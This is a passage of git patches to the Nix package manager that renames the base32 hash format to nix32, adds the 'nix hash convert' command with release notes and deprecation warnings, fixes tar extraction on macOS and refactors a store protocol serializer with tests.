"26mrvc0v1nslch8r0w45zywsbc" "1v4gi57l97pmnylq6lmgxkhd5v" "143xibwh31h9bvxzalr0sjvbbvpa6ffs" "i4hj30pkrfdpgc5dbcgcydqviibfhm6d" "fxz2p030yba2bza71qhss79k3l5y24kd" "0mdqa9w1p6cmli6976v4wi0sw9r4p5prkj7lzfd1877wk11c9c73" "0qy6iz9yh6a079757mxdmypx0gcmnzjd3ij5q78bzk00vxll82lh" "0mkygpci4r4yb8zz5rs2kxcgvw0a2yf5zlj6r8qgfll6pnrqf0xd" "0zdl9zrg8r3i9c1g90lgg9ip5ijzv3yhz91i0zzn3r8ap9ws784gkp9dk9j3aglhgf1amqb0pj21mh7h1nxcl18akqvvf7ggqsy30yg" "19ncrpp37dx0nzzjw4k6zaqkb9mzaq2myhgpzh5aff7qqcj5wwdxslg6ixwncm7gyq8l761gwf87fgsh2bwfyr52s53k2dkqvw8c24x" "2kz74snvckxldmmbisz9ikmy031d28cs6xfdbl6rhxx42glpyz4vww4lajrc5akklxwixl0js4g84233pxvmbykiic5m7i5m9r4nr11" ]; hashesBase64 = [ "1B2M2Y8AsgTpgAmY7PhCfg==" "bGnufyEcZAQZ1TZswHauRg==" "uzQ4+6vUYOptvSfRU+IjOw==" "2jmj7l5rSw0yVb/vlWAYkK/YBwk=" "zVToVowbN88eW62wd5vL84IhIYk=" 
"bRLhCx0zHa0hDkf9JdTyYIArfnc=" "47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=" "kApEad8AzL/QwUXG0eS3lT3Qr6+t11NOOkAZ6NOPxmM=" "rQOHs72GUvcwykbSX5wXCvD9WJ9C5/I/Wp5kEtl9flY=" "z4PhNX7vuL3xVChQ1m2AB9Yg5AULVxXcg/SpIdNs6c5H0NE8XYXysP+DGNKHfuwvY7kxvUdBeoGlODJ6+SfaPg==" "nQiG+MaziTmKFiV7x5eA+rmDHH/BHIqwf6cyy3s0j+reOC+SYXycUwX++6CvAqtf05pYfTMJl/9b0NsZ92ZmUw==" "IWRLcqolnlpYjNOvuvsdQxD0iJaA9sg7nVMVlqWihPNNvr/0CdI7zIau5rrRDIkWBvB1xvR1XLU22ifbVpPzpw==" ]; hashesSRI = [ "md5-1B2M2Y8AsgTpgAmY7PhCfg==" "md5-bGnufyEcZAQZ1TZswHauRg==" "md5-uzQ4+6vUYOptvSfRU+IjOw==" "sha1-2jmj7l5rSw0yVb/vlWAYkK/YBwk=" "sha1-zVToVowbN88eW62wd5vL84IhIYk=" "sha1-bRLhCx0zHa0hDkf9JdTyYIArfnc=" "sha256-47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=" "sha256-kApEad8AzL/QwUXG0eS3lT3Qr6+t11NOOkAZ6NOPxmM=" "sha256-rQOHs72GUvcwykbSX5wXCvD9WJ9C5/I/Wp5kEtl9flY=" "sha512-z4PhNX7vuL3xVChQ1m2AB9Yg5AULVxXcg/SpIdNs6c5H0NE8XYXysP+DGNKHfuwvY7kxvUdBeoGlODJ6+SfaPg==" "sha512-nQiG+MaziTmKFiV7x5eA+rmDHH/BHIqwf6cyy3s0j+reOC+SYXycUwX++6CvAqtf05pYfTMJl/9b0NsZ92ZmUw==" "sha512-IWRLcqolnlpYjNOvuvsdQxD0iJaA9sg7nVMVlqWihPNNvr/0CdI7zIau5rrRDIkWBvB1xvR1XLU22ifbVpPzpw==" ]; } +{ hashesBase16 = [ "d41d8cd98f00b204e9800998ecf8427e" "6c69ee7f211c640419d5366cc076ae46" "bb3438fbabd460ea6dbd27d153e2233b" "da39a3ee5e6b4b0d3255bfef95601890afd80709" "cd54e8568c1b37cf1e5badb0779bcbf382212189" "6d12e10b1d331dad210e47fd25d4f260802b7e77" "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855" "900a4469df00ccbfd0c145c6d1e4b7953dd0afafadd7534e3a4019e8d38fc663" "ad0387b3bd8652f730ca46d25f9c170af0fd589f42e7f23f5a9e6412d97d7e56" "cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e" "9d0886f8c6b389398a16257bc79780fab9831c7fc11c8ab07fa732cb7b348feade382f92617c9c5305fefba0af02ab5fd39a587d330997ff5bd0db19f7666653" "21644b72aa259e5a588cd3afbafb1d4310f4889680f6c83b9d531596a5a284f34dbebff409d23bcc86aee6bad10c891606f075c6f4755cb536da27db5693f3a7" ]; hashesBase32 = [ 
"3y8bwfr609h3lh9ch0izcqq7fl" "26mrvc0v1nslch8r0w45zywsbc" "1v4gi57l97pmnylq6lmgxkhd5v" "143xibwh31h9bvxzalr0sjvbbvpa6ffs" "i4hj30pkrfdpgc5dbcgcydqviibfhm6d" "fxz2p030yba2bza71qhss79k3l5y24kd" "0mdqa9w1p6cmli6976v4wi0sw9r4p5prkj7lzfd1877wk11c9c73" "0qy6iz9yh6a079757mxdmypx0gcmnzjd3ij5q78bzk00vxll82lh" "0mkygpci4r4yb8zz5rs2kxcgvw0a2yf5zlj6r8qgfll6pnrqf0xd" "0zdl9zrg8r3i9c1g90lgg9ip5ijzv3yhz91i0zzn3r8ap9ws784gkp9dk9j3aglhgf1amqb0pj21mh7h1nxcl18akqvvf7ggqsy30yg" "19ncrpp37dx0nzzjw4k6zaqkb9mzaq2myhgpzh5aff7qqcj5wwdxslg6ixwncm7gyq8l761gwf87fgsh2bwfyr52s53k2dkqvw8c24x" "2kz74snvckxldmmbisz9ikmy031d28cs6xfdbl6rhxx42glpyz4vww4lajrc5akklxwixl0js4g84233pxvmbykiic5m7i5m9r4nr11" ]; hashesBase64 = [ "1B2M2Y8AsgTpgAmY7PhCfg==" "bGnufyEcZAQZ1TZswHauRg==" "uzQ4+6vUYOptvSfRU+IjOw==" "2jmj7l5rSw0yVb/vlWAYkK/YBwk=" "zVToVowbN88eW62wd5vL84IhIYk=" "bRLhCx0zHa0hDkf9JdTyYIArfnc=" "47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=" "kApEad8AzL/QwUXG0eS3lT3Qr6+t11NOOkAZ6NOPxmM=" "rQOHs72GUvcwykbSX5wXCvD9WJ9C5/I/Wp5kEtl9flY=" "z4PhNX7vuL3xVChQ1m2AB9Yg5AULVxXcg/SpIdNs6c5H0NE8XYXysP+DGNKHfuwvY7kxvUdBeoGlODJ6+SfaPg==" "nQiG+MaziTmKFiV7x5eA+rmDHH/BHIqwf6cyy3s0j+reOC+SYXycUwX++6CvAqtf05pYfTMJl/9b0NsZ92ZmUw==" "IWRLcqolnlpYjNOvuvsdQxD0iJaA9sg7nVMVlqWihPNNvr/0CdI7zIau5rrRDIkWBvB1xvR1XLU22ifbVpPzpw==" ]; hashesNix32 = [ "3y8bwfr609h3lh9ch0izcqq7fl" "26mrvc0v1nslch8r0w45zywsbc" "1v4gi57l97pmnylq6lmgxkhd5v" "143xibwh31h9bvxzalr0sjvbbvpa6ffs" "i4hj30pkrfdpgc5dbcgcydqviibfhm6d" "fxz2p030yba2bza71qhss79k3l5y24kd" "0mdqa9w1p6cmli6976v4wi0sw9r4p5prkj7lzfd1877wk11c9c73" "0qy6iz9yh6a079757mxdmypx0gcmnzjd3ij5q78bzk00vxll82lh" "0mkygpci4r4yb8zz5rs2kxcgvw0a2yf5zlj6r8qgfll6pnrqf0xd" "0zdl9zrg8r3i9c1g90lgg9ip5ijzv3yhz91i0zzn3r8ap9ws784gkp9dk9j3aglhgf1amqb0pj21mh7h1nxcl18akqvvf7ggqsy30yg" "19ncrpp37dx0nzzjw4k6zaqkb9mzaq2myhgpzh5aff7qqcj5wwdxslg6ixwncm7gyq8l761gwf87fgsh2bwfyr52s53k2dkqvw8c24x" "2kz74snvckxldmmbisz9ikmy031d28cs6xfdbl6rhxx42glpyz4vww4lajrc5akklxwixl0js4g84233pxvmbykiic5m7i5m9r4nr11" ]; hashesSRI = [ 
"md5-1B2M2Y8AsgTpgAmY7PhCfg==" "md5-bGnufyEcZAQZ1TZswHauRg==" "md5-uzQ4+6vUYOptvSfRU+IjOw==" "sha1-2jmj7l5rSw0yVb/vlWAYkK/YBwk=" "sha1-zVToVowbN88eW62wd5vL84IhIYk=" "sha1-bRLhCx0zHa0hDkf9JdTyYIArfnc=" "sha256-47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=" "sha256-kApEad8AzL/QwUXG0eS3lT3Qr6+t11NOOkAZ6NOPxmM=" "sha256-rQOHs72GUvcwykbSX5wXCvD9WJ9C5/I/Wp5kEtl9flY=" "sha512-z4PhNX7vuL3xVChQ1m2AB9Yg5AULVxXcg/SpIdNs6c5H0NE8XYXysP+DGNKHfuwvY7kxvUdBeoGlODJ6+SfaPg==" "sha512-nQiG+MaziTmKFiV7x5eA+rmDHH/BHIqwf6cyy3s0j+reOC+SYXycUwX++6CvAqtf05pYfTMJl/9b0NsZ92ZmUw==" "sha512-IWRLcqolnlpYjNOvuvsdQxD0iJaA9sg7nVMVlqWihPNNvr/0CdI7zIau5rrRDIkWBvB1xvR1XLU22ifbVpPzpw==" ]; } diff --git a/tests/functional/lang/eval-okay-convertHash.nix b/tests/functional/lang/eval-okay-convertHash.nix index cf4909aaf..a0191ee8d 100644 --- a/tests/functional/lang/eval-okay-convertHash.nix +++ b/tests/functional/lang/eval-okay-convertHash.nix @@ -5,12 +5,14 @@ let map2' = f: fsts: snds: map2 f { inherit fsts snds; }; getOutputHashes = hashes: { hashesBase16 = map2' (hashAlgo: hash: builtins.convertHash { inherit hash hashAlgo; toHashFormat = "base16";}) hashAlgos hashes; + hashesNix32 = map2' (hashAlgo: hash: builtins.convertHash { inherit hash hashAlgo; toHashFormat = "nix32";}) hashAlgos hashes; hashesBase32 = map2' (hashAlgo: hash: builtins.convertHash { inherit hash hashAlgo; toHashFormat = "base32";}) hashAlgos hashes; hashesBase64 = map2' (hashAlgo: hash: builtins.convertHash { inherit hash hashAlgo; toHashFormat = "base64";}) hashAlgos hashes; hashesSRI = map2' (hashAlgo: hash: builtins.convertHash { inherit hash hashAlgo; toHashFormat = "sri" ;}) hashAlgos hashes; }; getOutputHashesColon = hashes: { hashesBase16 = map2' (hashAlgo: hashBody: builtins.convertHash { hash = hashAlgo + ":" + hashBody; toHashFormat = "base16";}) hashAlgos hashes; + hashesNix32 = map2' (hashAlgo: hashBody: builtins.convertHash { hash = hashAlgo + ":" + hashBody; toHashFormat = "nix32";}) hashAlgos hashes; hashesBase32 = 
map2' (hashAlgo: hashBody: builtins.convertHash { hash = hashAlgo + ":" + hashBody; toHashFormat = "base32";}) hashAlgos hashes; hashesBase64 = map2' (hashAlgo: hashBody: builtins.convertHash { hash = hashAlgo + ":" + hashBody; toHashFormat = "base64";}) hashAlgos hashes; hashesSRI = map2' (hashAlgo: hashBody: builtins.convertHash { hash = hashAlgo + ":" + hashBody; toHashFormat = "sri" ;}) hashAlgos hashes; diff --git a/tests/unit/libutil/hash.cc b/tests/unit/libutil/hash.cc index 4d82c7f09..a88994d0b 100644 --- a/tests/unit/libutil/hash.cc +++ b/tests/unit/libutil/hash.cc @@ -80,7 +80,7 @@ namespace nix { * --------------------------------------------------------------------------*/ TEST(hashFormat, testRoundTripPrintParse) { - for (const HashFormat hashFormat: { HashFormat::Base64, HashFormat::Base32, HashFormat::Base16, HashFormat::SRI}) { + for (const HashFormat hashFormat: { HashFormat::Base64, HashFormat::Nix32, HashFormat::Base16, HashFormat::SRI}) { ASSERT_EQ(parseHashFormat(printHashFormat(hashFormat)), hashFormat); ASSERT_EQ(*parseHashFormatOpt(printHashFormat(hashFormat)), hashFormat); } From 7ff876b92b590fd9559472935f4adce1d3d5efb7 Mon Sep 17 00:00:00 2001 From: Peter Kolloch Date: Tue, 28 Nov 2023 15:58:04 +0100 Subject: [PATCH 062/654] Add deprecation notice for old nix hash conversion subcommands. (But not yet nix-hash since `nix hash` is still hidden behind a feature flag.) 
https://github.com/NixOS/nix/issues/8876 --- src/nix/hash.cc | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/src/nix/hash.cc b/src/nix/hash.cc index f9c7592a3..2c9deb0d5 100644 --- a/src/nix/hash.cc +++ b/src/nix/hash.cc @@ -127,6 +127,7 @@ struct CmdToBase : Command void run() override { + warn("The old format conversion sub commands of `nix hash` where deprecated in favor of `nix hash convert`."); for (auto s : args) logger->cout(Hash::parseAny(s, ht).to_string(hashFormat, hashFormat == HashFormat::SRI)); } @@ -208,6 +209,9 @@ static auto rCmdHash = registerCommand("hash"); /* Legacy nix-hash command. */ static int compatNixHash(int argc, char * * argv) { + // Wait until `nix hash convert` is not hidden behind experimental flags anymore. + // warn("`nix-hash` has been deprecated in favor of `nix hash convert`."); + std::optional ha; bool flat = false; HashFormat hashFormat = HashFormat::Base16; From 8afeaf05c4063d48e65d2d82c31c3323c3237f7c Mon Sep 17 00:00:00 2001 From: Peter Kolloch Date: Tue, 28 Nov 2023 19:02:15 +0100 Subject: [PATCH 063/654] Add docs/rl-notes for `nix hash convert` / `builtins.convertHash` https://github.com/NixOS/nix/issues/8876 --- doc/manual/rl-next/hash-format-nix32.md | 22 ++++++++++++ doc/manual/rl-next/nix-hash-convert.md | 47 +++++++++++++++++++++++++ src/libexpr/primops.cc | 8 ++--- src/nix/hash.cc | 2 +- 4 files changed, 74 insertions(+), 5 deletions(-) create mode 100644 doc/manual/rl-next/hash-format-nix32.md create mode 100644 doc/manual/rl-next/nix-hash-convert.md diff --git a/doc/manual/rl-next/hash-format-nix32.md b/doc/manual/rl-next/hash-format-nix32.md new file mode 100644 index 000000000..20c557da9 --- /dev/null +++ b/doc/manual/rl-next/hash-format-nix32.md @@ -0,0 +1,22 @@ +synopsis: Rename hash format `base32` to `nix32` +prs: #9452 +description: { + +Hash format `base32` was renamed to `nix32` since it used a special nix-specific character set for +[Base32](https://en.wikipedia.org/wiki/Base32). 
+ +## Deprecation: Use `nix32` instead of `base32` as `toHashFormat` + +For the builtin `convertHash`, the `toHashFormat` parameter now accepts the same hash formats as the `--to`/`--from` +parameters of the `nix hash convert` command: `"base16"`, `"nix32"`, `"base64"`, and `"sri"`. The former `"base32"` value +remains as a deprecated alias for `"nix32"`. Please convert your code from: + +```nix +builtins.convertHash { inherit hash hashAlgo; toHashFormat = "base32";} +``` + +to + +```nix +builtins.convertHash { inherit hash hashAlgo; toHashFormat = "nix32";} +``` \ No newline at end of file diff --git a/doc/manual/rl-next/nix-hash-convert.md b/doc/manual/rl-next/nix-hash-convert.md new file mode 100644 index 000000000..de4367c5b --- /dev/null +++ b/doc/manual/rl-next/nix-hash-convert.md @@ -0,0 +1,47 @@ +synopsis: Add `nix hash convert` +prs: #9452 +description: { + +New [`nix hash convert`](https://github.com/NixOS/nix/issues/8876) sub command with a fast track +to stabilization! Examples: + +- Convert the hash to `nix32`. + + ```bash + $ nix hash convert --algo "sha1" --to nix32 "800d59cfcd3c05e900cb4e214be48f6b886a08df" + vw46m23bizj4n8afrc0fj19wrp7mj3c0 + ``` + `nix32` is a base32 encoding with a nix-specific character set. + Explicitly specify the hashing algorithm (optional with SRI hashes) but detect hash format by the length of the input + hash. 
+- Convert the hash to the `sri` format that includes an algorithm specification: + ```bash + nix hash convert --algo "sha1" "800d59cfcd3c05e900cb4e214be48f6b886a08df" + sha1-gA1Zz808BekAy04hS+SPa4hqCN8= + ``` + or with an explicit `--to` format: + ```bash + nix hash convert --algo "sha1" --to sri "800d59cfcd3c05e900cb4e214be48f6b886a08df" + sha1-gA1Zz808BekAy04hS+SPa4hqCN8= + ``` +- Assert the input format of the hash: + ```bash + nix hash convert --algo "sha256" --from nix32 "ungWv48Bz+pBQUDeXa4iI7ADYaOWF3qctBD/YfIAFa0=" + error: input hash 'ungWv48Bz+pBQUDeXa4iI7ADYaOWF3qctBD/YfIAFa0=' does not have the expected format '--from nix32' + nix hash convert --algo "sha256" --from nix32 "1b8m03r63zqhnjf7l5wnldhh7c134ap5vpj0850ymkq1iyzicy5s" + sha256-ungWv48Bz+pBQUDeXa4iI7ADYaOWF3qctBD/YfIAFa0= + ``` + +The `--to`/`--from`/`--algo` parameters have context-sensitive auto-completion. + +## Related Deprecations + +The following commands are still available but will emit a deprecation warning. Please convert your code to +`nix hash convert`: + +- `nix hash to-base16 $hash1 $hash2`: Use `nix hash convert --to base16 $hash1 $hash2` instead. +- `nix hash to-base32 $hash1 $hash2`: Use `nix hash convert --to nix32 $hash1 $hash2` instead. +- `nix hash to-base64 $hash1 $hash2`: Use `nix hash convert --to base64 $hash1 $hash2` instead. +- `nix hash to-sri $hash1 $hash2`: Use `nix hash convert --to sri $hash1 $hash2` + or even just `nix hash convert $hash1 $hash2` instead. 
+} diff --git a/src/libexpr/primops.cc b/src/libexpr/primops.cc index 7831f3803..4162a8da3 100644 --- a/src/libexpr/primops.cc +++ b/src/libexpr/primops.cc @@ -1339,7 +1339,7 @@ drvName, Bindings * attrs, Value & v) .errPos = state.positions[noPos] }); - auto ht = parseHashAlgoOpt(outputHashAlgo).value_or(HashAlgorithm::SHA256); + auto ha = parseHashAlgoOpt(outputHashAlgo).value_or(HashAlgorithm::SHA256); auto method = ingestionMethod.value_or(FileIngestionMethod::Recursive); for (auto & i : outputs) { @@ -1348,13 +1348,13 @@ drvName, Bindings * attrs, Value & v) drv.outputs.insert_or_assign(i, DerivationOutput::Impure { .method = method, - .hashAlgo = ht, + .hashAlgo = ha, }); else drv.outputs.insert_or_assign(i, DerivationOutput::CAFloating { .method = method, - .hashAlgo = ht, + .hashAlgo = ha, }); } } @@ -3837,7 +3837,7 @@ static RegisterPrimOp primop_convertHash({ The format of the resulting hash. Must be one of - `"base16"` - - `"base32"` + - `"nix32"` - `"base64"` - `"sri"` diff --git a/src/nix/hash.cc b/src/nix/hash.cc index 2c9deb0d5..0bba3b7d2 100644 --- a/src/nix/hash.cc +++ b/src/nix/hash.cc @@ -118,7 +118,7 @@ struct CmdToBase : Command std::string description() override { - return fmt("convert a hash to %s representation", + return fmt("convert a hash to %s representation (deprecated, use `nix hash convert` instead)", hashFormat == HashFormat::Base16 ? "base-16" : hashFormat == HashFormat::Nix32 ? "base-32" : hashFormat == HashFormat::Base64 ? 
"base-64" : From d38ec1285573c98c987ec1421f7cec68754204f9 Mon Sep 17 00:00:00 2001 From: Peter Kolloch Date: Sat, 2 Dec 2023 11:53:50 +0100 Subject: [PATCH 064/654] Update src/libexpr/primops.cc MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Co-authored-by: Théophane Hufschmitt <7226587+thufschmitt@users.noreply.github.com> --- src/libexpr/primops.cc | 1 + 1 file changed, 1 insertion(+) diff --git a/src/libexpr/primops.cc b/src/libexpr/primops.cc index 4162a8da3..828d118eb 100644 --- a/src/libexpr/primops.cc +++ b/src/libexpr/primops.cc @@ -3838,6 +3838,7 @@ static RegisterPrimOp primop_convertHash({ The format of the resulting hash. Must be one of - `"base16"` - `"nix32"` + - `"base32"` (deprecated alias for `"nix32"`) - `"base64"` - `"sri"` From bbba2055f0b77e9677ef318ceea3084906eccd7d Mon Sep 17 00:00:00 2001 From: Peter Kolloch Date: Sat, 2 Dec 2023 16:43:52 +0100 Subject: [PATCH 065/654] Refactor concurrently added tests to use HashAlgorithm. https://github.com/NixOS/nix/issues/8876 --- tests/unit/libutil-support/tests/hash.cc | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/tests/unit/libutil-support/tests/hash.cc b/tests/unit/libutil-support/tests/hash.cc index 577e9890e..50889cd33 100644 --- a/tests/unit/libutil-support/tests/hash.cc +++ b/tests/unit/libutil-support/tests/hash.cc @@ -11,7 +11,7 @@ using namespace nix; Gen Arbitrary::arbitrary() { - Hash hash(htSHA1); + Hash hash(HashAlgorithm::SHA1); for (size_t i = 0; i < hash.hashSize; ++i) hash.hash[i] = *gen::arbitrary(); return gen::just(hash); From e9a5365db66737d1438fd91eba6529d278e1efca Mon Sep 17 00:00:00 2001 From: Peter Kolloch Date: Sat, 2 Dec 2023 18:19:51 +0100 Subject: [PATCH 066/654] hash.sh: Make failure tests more tolerant of additional output "warning: you don'\''t have Internet access; disabling some network-dependent features" ... 
https://github.com/NixOS/nix/issues/8876 --- tests/functional/hash.sh | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/tests/functional/hash.sh b/tests/functional/hash.sh index 278ed83b9..47eed5178 100644 --- a/tests/functional/hash.sh +++ b/tests/functional/hash.sh @@ -173,11 +173,11 @@ try3() { # fail=$(nix hash convert --algo "$1" --from nix32 "$2" 2>&1 || echo "exit: $?") - [[ "$fail" == "error: input hash"*"exit: 1" ]] + [[ "$fail" == *"error: input hash"*"exit: 1" ]] fail=$(nix hash convert --algo "$1" --from base16 "$3" 2>&1 || echo "exit: $?") - [[ "$fail" == "error: input hash"*"exit: 1" ]] + [[ "$fail" == *"error: input hash"*"exit: 1" ]] fail=$(nix hash convert --algo "$1" --from nix32 "$4" 2>&1 || echo "exit: $?") - [[ "$fail" == "error: input hash"*"exit: 1" ]] + [[ "$fail" == *"error: input hash"*"exit: 1" ]] } From 9a1a3c43bf11912ad32c433219c4c21a1b6ca9dd Mon Sep 17 00:00:00 2001 From: Peter Kolloch Date: Sun, 3 Dec 2023 09:50:44 +0100 Subject: [PATCH 067/654] Store.xs: fix references to HashFormat::Nix32 https://github.com/NixOS/nix/issues/8876 --- perl/lib/Nix/Store.xs | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/perl/lib/Nix/Store.xs b/perl/lib/Nix/Store.xs index 50148141b..82c7db608 100644 --- a/perl/lib/Nix/Store.xs +++ b/perl/lib/Nix/Store.xs @@ -78,7 +78,7 @@ SV * queryReferences(char * path) SV * queryPathHash(char * path) PPCODE: try { - auto s = store()->queryPathInfo(store()->parseStorePath(path))->narHash.to_string(HashFormat::Base32, true); + auto s = store()->queryPathInfo(store()->parseStorePath(path))->narHash.to_string(HashFormat::Nix32, true); XPUSHs(sv_2mortal(newSVpv(s.c_str(), 0))); } catch (Error & e) { croak("%s", e.what()); @@ -104,7 +104,7 @@ SV * queryPathInfo(char * path, int base32) XPUSHs(&PL_sv_undef); else XPUSHs(sv_2mortal(newSVpv(store()->printStorePath(*info->deriver).c_str(), 0))); - auto s = info->narHash.to_string(base32 ? 
HashFormat::Base32 : HashFormat::Base16, true); + auto s = info->narHash.to_string(base32 ? HashFormat::Nix32 : HashFormat::Base16, true); XPUSHs(sv_2mortal(newSVpv(s.c_str(), 0))); mXPUSHi(info->registrationTime); mXPUSHi(info->narSize); @@ -206,7 +206,7 @@ SV * hashPath(char * algo, int base32, char * path) PPCODE: try { Hash h = hashPath(parseHashAlgo(algo), path).first; - auto s = h.to_string(base32 ? HashFormat::Base32 : HashFormat::Base16, false); + auto s = h.to_string(base32 ? HashFormat::Nix32 : HashFormat::Base16, false); XPUSHs(sv_2mortal(newSVpv(s.c_str(), 0))); } catch (Error & e) { croak("%s", e.what()); @@ -217,7 +217,7 @@ SV * hashFile(char * algo, int base32, char * path) PPCODE: try { Hash h = hashFile(parseHashAlgo(algo), path); - auto s = h.to_string(base32 ? HashFormat::Base32 : HashFormat::Base16, false); + auto s = h.to_string(base32 ? HashFormat::Nix32 : HashFormat::Base16, false); XPUSHs(sv_2mortal(newSVpv(s.c_str(), 0))); } catch (Error & e) { croak("%s", e.what()); @@ -228,7 +228,7 @@ SV * hashString(char * algo, int base32, char * s) PPCODE: try { Hash h = hashString(parseHashAlgo(algo), s); - auto s = h.to_string(base32 ? HashFormat::Base32 : HashFormat::Base16, false); + auto s = h.to_string(base32 ? HashFormat::Nix32 : HashFormat::Base16, false); XPUSHs(sv_2mortal(newSVpv(s.c_str(), 0))); } catch (Error & e) { croak("%s", e.what()); @@ -239,7 +239,7 @@ SV * convertHash(char * algo, char * s, int toBase32) PPCODE: try { auto h = Hash::parseAny(s, parseHashAlgo(algo)); - auto s = h.to_string(toBase32 ? HashFormat::Base32 : HashFormat::Base16, false); + auto s = h.to_string(toBase32 ? 
HashFormat::Nix32 : HashFormat::Base16, false); XPUSHs(sv_2mortal(newSVpv(s.c_str(), 0))); } catch (Error & e) { croak("%s", e.what()); From bf00d5ecef20c11eb7e49dff3482b9e536cf7abe Mon Sep 17 00:00:00 2001 From: Bryan Honof Date: Thu, 7 Dec 2023 11:04:48 +0100 Subject: [PATCH 068/654] fix(libutil/tarfile): add option to libarchive so it behaves correctly with AppleDouble files AppleDouble files were extracted differently on macOS machines than on other UNIX's. Setting `archive_read_set_format_option(this->archive, NULL ,"mac-ext",NULL)` fixes this problem, since it just ignores the AppleDouble file and treats it as a normal one. This was a problem since it caused source archives to be different between macOS and Linux. Ref: nixos/nix#9290 --- src/libutil/tarfile.cc | 2 ++ 1 file changed, 2 insertions(+) diff --git a/src/libutil/tarfile.cc b/src/libutil/tarfile.cc index 1733c791c..187b3e948 100644 --- a/src/libutil/tarfile.cc +++ b/src/libutil/tarfile.cc @@ -53,6 +53,7 @@ TarArchive::TarArchive(Source & source, bool raw) : buffer(65536) archive_read_support_format_raw(archive); archive_read_support_format_empty(archive); } + archive_read_set_option(archive, NULL, "mac-ext", NULL); check(archive_read_open(archive, (void *)this, callback_open, callback_read, callback_close), "Failed to open archive (%s)"); } @@ -63,6 +64,7 @@ TarArchive::TarArchive(const Path & path) archive_read_support_filter_all(archive); archive_read_support_format_all(archive); + archive_read_set_option(archive, NULL, "mac-ext", NULL); check(archive_read_open_filename(archive, path.c_str(), 16384), "failed to open archive: %s"); } From a5521b7d9445af63a159d4fe7b44a0902c3a2a24 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Thu, 7 Dec 2023 10:49:29 -0500 Subject: [PATCH 069/654] Factor out `ServeProto::Serialiser` and test In the process, partially undo e89b5bd0bfeb4dfdd8fe7e6929544cb9ceb8a505 in that the ancient < 2.4 version is now supported by the serializer again.
`LegacySSHStore`, instead of also asserting that the version is at least 4, just checks that `narHash` is set. This allows us to better test the serializer in isolation for both versions (< 4 and >= 4). --- src/libstore/legacy-ssh-store.cc | 22 ++--- src/libstore/serve-protocol.cc | 44 ++++++++++ src/libstore/serve-protocol.hh | 3 + src/nix-store/nix-store.cc | 12 +-- .../unkeyed-valid-path-info-2.3.bin | Bin 0 -> 184 bytes .../unkeyed-valid-path-info-2.4.bin | Bin 0 -> 648 bytes tests/unit/libstore/serve-protocol.cc | 77 ++++++++++++++++++ 7 files changed, 131 insertions(+), 27 deletions(-) create mode 100644 tests/unit/libstore/data/serve-protocol/unkeyed-valid-path-info-2.3.bin create mode 100644 tests/unit/libstore/data/serve-protocol/unkeyed-valid-path-info-2.4.bin diff --git a/src/libstore/legacy-ssh-store.cc b/src/libstore/legacy-ssh-store.cc index fb1580dd6..277445ee6 100644 --- a/src/libstore/legacy-ssh-store.cc +++ b/src/libstore/legacy-ssh-store.cc @@ -172,24 +172,12 @@ struct LegacySSHStore : public virtual LegacySSHStoreConfig, public virtual Stor if (p.empty()) return callback(nullptr); auto path2 = parseStorePath(p); assert(path == path2); - /* Hash will be set below. FIXME construct ValidPathInfo at end. 
*/ - auto info = std::make_shared(path, Hash::dummy); + auto info = std::make_shared( + path, + ServeProto::Serialise::read(*this, *conn)); - auto deriver = readString(conn->from); - if (deriver != "") - info->deriver = parseStorePath(deriver); - info->references = ServeProto::Serialise::read(*this, *conn); - readLongLong(conn->from); // download size - info->narSize = readLongLong(conn->from); - - { - auto s = readString(conn->from); - if (s == "") - throw Error("NAR hash is now mandatory"); - info->narHash = Hash::parseAnyPrefixed(s); - } - info->ca = ContentAddress::parseOpt(readString(conn->from)); - info->sigs = readStrings(conn->from); + if (info->narHash == Hash::dummy) + throw Error("NAR hash is now mandatory"); auto s = readString(conn->from); assert(s == ""); diff --git a/src/libstore/serve-protocol.cc b/src/libstore/serve-protocol.cc index fb33553c5..c37b3095c 100644 --- a/src/libstore/serve-protocol.cc +++ b/src/libstore/serve-protocol.cc @@ -5,6 +5,7 @@ #include "serve-protocol.hh" #include "serve-protocol-impl.hh" #include "archive.hh" +#include "path-info.hh" #include @@ -54,4 +55,47 @@ void ServeProto::Serialise::write(const StoreDirConfig & store, Ser } } + +UnkeyedValidPathInfo ServeProto::Serialise::read(const StoreDirConfig & store, ReadConn conn) +{ + /* Hash should be set below unless very old `nix-store --serve`. + Caller should assert that it did set it. 
*/ + UnkeyedValidPathInfo info { Hash::dummy }; + + auto deriver = readString(conn.from); + if (deriver != "") + info.deriver = store.parseStorePath(deriver); + info.references = ServeProto::Serialise::read(store, conn); + + readLongLong(conn.from); // download size, unused + info.narSize = readLongLong(conn.from); + + if (GET_PROTOCOL_MINOR(conn.version) >= 4) { + auto s = readString(conn.from); + if (!s.empty()) + info.narHash = Hash::parseAnyPrefixed(s); + info.ca = ContentAddress::parseOpt(readString(conn.from)); + info.sigs = readStrings(conn.from); + } + + return info; +} + +void ServeProto::Serialise::write(const StoreDirConfig & store, WriteConn conn, const UnkeyedValidPathInfo & info) +{ + conn.to + << (info.deriver ? store.printStorePath(*info.deriver) : ""); + + ServeProto::write(store, conn, info.references); + // !!! Maybe we want compression? + conn.to + << info.narSize // downloadSize, lie a little + << info.narSize; + if (GET_PROTOCOL_MINOR(conn.version) >= 4) + conn.to + << info.narHash.to_string(HashFormat::Nix32, true) + << renderContentAddress(info.ca) + << info.sigs; +} + } diff --git a/src/libstore/serve-protocol.hh b/src/libstore/serve-protocol.hh index 6e9d66e2d..ada67a149 100644 --- a/src/libstore/serve-protocol.hh +++ b/src/libstore/serve-protocol.hh @@ -18,6 +18,7 @@ struct Source; // items being serialised struct BuildResult; +struct UnkeyedValidPathInfo; /** @@ -141,6 +142,8 @@ 